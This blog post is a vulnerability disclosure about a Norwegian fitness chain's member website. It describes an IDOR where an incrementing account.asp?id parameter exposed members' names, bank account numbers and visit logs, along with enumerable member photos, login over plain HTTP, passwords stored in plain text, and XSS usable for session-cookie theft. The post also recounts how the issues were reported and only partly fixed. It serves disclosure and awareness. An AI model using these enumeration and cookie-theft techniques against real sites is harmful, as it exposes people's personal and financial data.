Case #7: Fitness center chain was leaking personal info

Is your gym telling on you? It sure was telling on me and my fellow members. Everything from contact info to pictures to bank account numbers to the time people enter the gym was leaking for a long, long time.

Published: Mon, September 25, 2017, 07:15
Security Monday
Information leak
OWASP 2013 A3
OWASP 2013 A7

tl;dr πŸ”—

A fitness center chain consisting of three centers was leaking the members' names, e-mail addresses, phone numbers, pictures, bank account numbers, logs of all visits, etc. They are still running vulnerable server software.

Summary πŸ”—

Who: Energi Treningssenter
Severity level: High
Reported: April 2017
Reception and handling: Good
Status: Partially fixed
Reward: A thank you
Issue: All kinds of personal info was leaked

Background πŸ”—

Energi Treningssenter at AskΓΈy is an excellent fitness center. It's modern, big and has all the equipment you want. I used to train there for a while, so I had - and still have - access to the member site where you see your personal details, payment history and full log of your visits.

Some years ago I noticed that the picture taken for the key card to the gym was publicly available. Just knowing the URL you could iterate through the images of all the members without having to be logged in. I never bothered to report it back then. When I started considering this article series I remembered the issue with the pictures and wondered if my personal data was safe. The whole site had much of the feel as the completely vulnerable PHP site I wrote about earlier on.

Approach (technical stuff) πŸ”—

I logged in to the gym's site while having the browser development tools open. I looked for anything out of the ordinary in the HTTP calls and in the source code.

No encryption πŸ”—

The first thing that hit me is that all URLs are http and not https. Even when submitting the form with username and password there is no encryption.

The secrets of the source πŸ”—

I spotted three links to an ASP that was hidden with CSS: display: none;

The ASP looked like it let you change database fields for any user, but from failing to even change my own data I'm not sure what the deal was. However, this page was vulnerable for XSS. A good opportunity to steal the session cookie which seems to work perfectly fine across IP addresses. Or one could just let the user send his or her personal data directly.

The source also revealed the use of some kind of "add on" used for file upload. Is it possible to upload code that can be executed? I hope not. I wasn't able to make tell for sure, but there was indeed web forms for uploading all kinds of files.

Known vulnerabilities πŸ”—

There seems to be three different servers involved serving the site. Looking at the headers and the default error pages reveals outdated server software that have known vulnerabilities. However, as I've stated in the background for these posts, that is out of scope for now.

Plain text passwords πŸ”—

When you log in you will be told if the username you entered exists or not. If you use the "Forgot password" function you're told if you're entering a known e-mail address or not. And the e-mail you receive is not for resetting the password, it just contains both the username and the password. Fail x 3.

The lucky guess πŸ”—

The page with all the personal details doesn't have any IDs or anything, but that doesn't mean that I couldn't try adding it. I tried account.asp?id=<some ID>, and voilΓ , I got access to other users' personal details. The ID was an incremental integer. Iterating the ID one could seemingly get everyone's name, e-mail address, phone number, bank account number, payment history and full visit log.

Security issues πŸ”—

A lot of personal data of previous and current members was leaked:

  • Customer number (also used as username)
  • Full name
  • E-mail address
  • Phone number
  • Bank account number
  • Picture
  • Not fixed: Log of all visits
  • Full payment history

In addition there are quite a few issues that's probably still making the customer data vulnerable:

  • Not fixed: There's no encryption - not even when logging in
  • Not fixed: Passwords are stored in plain text
  • Not fixed: "Forgot password" e-mail contains both username and password
  • Not fixed: Cross Site Scripting
  • Not fixed: Old application server with known vulnerabilities
  • Not fixed: Old ASP.NET version with known vulnerabilities

I believe that these issues have been around for many years.

Reception and handling πŸ”—

Day zero πŸ”—

At night I sent an e-mail telling about the information leak and general concerns about the solution.

Just 1,5 hour later I got a reply telling that the issue was forwarded to the right body.

Day 22 πŸ”—

I received an e-mail telling that the vendor of the system had fixed the issue. I see that they have removed the issue with the information leak, but everything else still is the same.

Conclusion πŸ”—

This is yet another example of our personal data in the wild. There are countless security vulnerabilities out there. You should assume that anyone who wants to, knows everything about you and everything you do. And companies that have these types of vulnerabilities won't tell you when they become aware of them.

And to start connecting the dots between the cases I'm representing; do you remember two weeks ago where you could see the bank account balance using just the bank account number? Well, wasn't it nice that this case gave you that bank account number?

Looking at the old versions of the software running on these sites I would definitely guess that the data is still vulnerable.

Get notified when there are new posts! :-)